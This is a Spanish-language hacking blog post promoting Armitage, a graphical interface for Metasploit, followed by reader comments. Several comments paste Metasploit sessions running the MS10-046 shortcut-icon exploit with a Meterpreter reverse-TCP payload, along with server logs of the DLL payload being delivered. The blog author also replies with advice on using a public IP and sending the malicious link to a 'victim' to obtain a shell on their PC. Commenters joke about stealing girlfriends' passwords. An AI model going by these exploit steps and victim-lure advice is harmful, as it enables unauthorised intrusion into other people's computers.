Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.
Armitage v11.25.10 |
El objetivo de Armitage es hacer Metasploit útil para los profesionales de seguridad que saben hacking, pero no el uso de Metasploit a fondo. Si desean aprender las características avanzadas de Metasploit, Armitage será de gran ayuda.
Es una herramienta impresionante y muy intuitiva, considero que la herramienta viene como anillo al dedo para los usuarios de Windows que están más acostumbrados a usar el mouse que el teclado (no como los usuarios de GNU/Linux que es al revés). Lo mejor de todo es que se encuentra para los 2 sistemas operativos.
Aquí les dejo 2 Videos oficiales de esta excelente herramienta, disfrútenlos:
Video Explicativo de Armitage (Está en inglés pero bastante entendible):
Video de Armitage en acción:
Para terminar un enlace a la web oficial donde pueden descargar el Armitage tanto para GNU/Linux como para Windows:
http://www.fastandeasyhacking.com/download
Correr Armitage en Windows:
Si tienen problemas nunca está demás leer el Manual oficial de Armitage (Inglés con imágenes).
[+] Eso
[+] Salu2 ;)
[+] PD: Este artículo lo pueden distrubuir como quieran, lo pueden copiar, modificar, sacar cosas, agregarles, pero por favor no olviden de donde sacaron la información. No cuesta nada poner de donde sacamos la información con un simple "Fuente: http://blackploit.blogspot.com/". No quería llegar al punto de poner estos mensajes al final del artículo, pero me he encontrado con muchos site que copian y pegan y se les olvida decir si quiera "Gracias".
[+] Salu2 finales XD
[+] ZioneR
[+] PD2: Disfruten la herramienta.
ajjajajajaja... soy windowslero y me encanta usar mouse XDD
ResponderEliminarVoy a probarlo ya mismo a ver que tal me corre en windows
Saludos
Lol, parece mucho mejor que la msfgui que trae MSF por defecto. Pero aun así parece que cada día les hacemos las cosas más faciles a los script kiddies para jackear a sus novias y robarles las pass del messenller.
ResponderEliminar.________.
@Drag0s
ResponderEliminarajajajajjajajja XD
Es que prefiero darles las herramientas facilitas que responder todos los emails que me llegan preguntando "como jackear a mi novia y robarle las pass del messenller" XDDD
En todo caso, los videos pintan la herramienta más simple de lo que es en verdad. Ahora mismo la estoy probando y es bastante amplia.
[+] Salu2
La he probado y cuando ejecuto el exe me solicita datos de Host y Port.
ResponderEliminarEn host viene por defecto lohalhost (127.0.0.1). Que hay que poner en estos datos??
Luego veo que tambien se puede poner para que sea SSL y el tipo de db...
La verdad es que no se como lanzarlo.
Dejo una captura delas opciones del programa:
http://fotosupload.com/mostrar.php?imagen=FuD164550_armitage.jpg
Un saludo y
Viejo... mira esta imagen, te va a ayudar ;)
ResponderEliminarhttp://www.fastandeasyhacking.com/images/msfrpcwindows.png
Pues no consigo conectar BT4 R2 con Güindows XP SP3, y hacen ping entre ellos y eso.
ResponderEliminarAlguna sugerencia¿?
http://s2.subirimagenes.com/otros/previo/thump_5594430sin-ttulo.jpg
mejor ésta captura que la de antes se ve muy pequeña, http://img189.imageshack.us/img189/3871/sinttulolfk.jpg
ResponderEliminarViejo, no entiendo tu duda... deberías intentar primero aprender Metasploit ;)
ResponderEliminarviejo me pasa lo mismo por lo menos pon la imagene del funcionamiento osea paso a paso asta llegar al metasploit gracia
ResponderEliminarZioneR llevo tiempo documentandome sobre Metasploit, y la parte teorica bien...pero a la hora de lanzar los exploits no se establece ninguna conexion.
ResponderEliminarhola chicos soy damary me gustaria que me den una ayudadita en esto pongo a correr .....Armitage.... yego asta esta parte y desde hay no se como añadir el hot osea no se lo siguiente miren
ResponderEliminaruse exploit/windows/browser/ms10_046_shortcut_icon_dllloader
meterpreter> set DisablePayloadHandler 1
DisablePayloadHandler => 1
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /
URIPATH => /
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j
[*] Exploit running as background job.
[*]
[*] Send vulnerable clients to \\123.137.17.8:80\ijMQw\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://123.137.17.8:80/
[-] Exploit exception: The supplied resource '/' is already added.
[*] Server stopped.
msf exploit(ms10_046_shortcut_icon_dllloader) > (NO SE QUE ASER AQUI )
bueno linda te alludo creo que deve dar clip en Ctrl R
ResponderEliminarpense que en esto era para darle ayuda pero veo k si uno tiene alguna duda del funcionamiento de algo nadie te brinda soporte gracia por nada
ResponderEliminar@Anónimo:
ResponderEliminarViejo.. Relax. Acabo de volver ya que había tenido mucho mucho trabajo y que haceres.
;)
@Anónimo:
ResponderEliminarBueno viejo.... aunque no va mucho al tema Armitage XD, si va al de mestasploit XD...
Bueno, el error que cometes es que en
"set SRVHOST 0.0.0.0" tienes que poner tu Ip pública.
Luego de que lanzas el exploit con "exploit -j" te aparecerá la URL máligna ("Using URL: http://tu_ip:80/") que tienes que enviar a tu víctima para que se ejecute el exploit y se conecte a tu PC según el payload que elegiste.
Después (si tu víctima abrió el link) se abrirá una shell hacia su PC.
[+] Salu2
buno gracias pero se un poquito mas rapidito que tu sabe k cuando estamos trabajando con hack tengo una cesacion grande mucha gracias
ResponderEliminarPor favor si me pueden ayudar estoy usando como SRVHOST miiplocal(192.168...) - tambien probe con la de afuera que seria la de cara a internet...
ResponderEliminarLa victima es un Win XP SP 2 Expañol.
El log se separa en 2 partes , porque genere 2 link's - creo - xD
(1- 192.168.1.35:1438 /EdKan/ )
(2 - 192.168.1.35:1438 /TLbLExJoMRv )
Sin mentirles les admito que lo que yo hago mal desde la virtual quizas es el procedimiento.
Copio y pego la direccion que me otorga al cargar osea /edkan y o /TLbLExJomRv desde un IE o sino desde el ejecutar y obtengo ese log de abajo.
Gracias a los que me puedan ayudar.
msf exploit(ms10_046_shortcut_icon_dllloader) > set SVRHOST 192.168.1.35
SVRHOST => 192.168.1.35
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j
[*] Exploit running as background job.
msf exploit(ms10_046_shortcut_icon_dllloader) >
[*]
[*] Send vulnerable clients to \\192.168.1.35\EDkaN\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.35:80/
[-] Exploit exception: The supplied resource '/' is already added.
[*] Server stopped.
[*] Responding to WebDAV OPTIONS request from 192.168.1.35:1438
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Sending UNC redirect to 192.168.1.35:1453 ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
[*] Sending 301 for /TLbLExJoMRv ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
[*] Sending directory multistatus for /TLbLExJoMRv/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/desktop.ini
[*] Sending 404 for /TLbLExJoMRv/desktop.ini ...
[*] Sending DLL payload 192.168.1.35:1438 ...
[*] Sending LNK file to 192.168.1.35:1438 ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/ovKtsdKSmY.dll.manifest
[*] Sending 404 for /TLbLExJoMRv/ovKtsdKSmY.dll.manifest ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/ovKtsdKSmY.dll.123.Manifest
[*] Sending 404 for /TLbLExJoMRv/ovKtsdKSmY.dll.123.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /EdKan
[*] Sending 301 for /EdKan ...
[*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /EdKan/
[*] Sending directory multistatus for /EdKan/ ...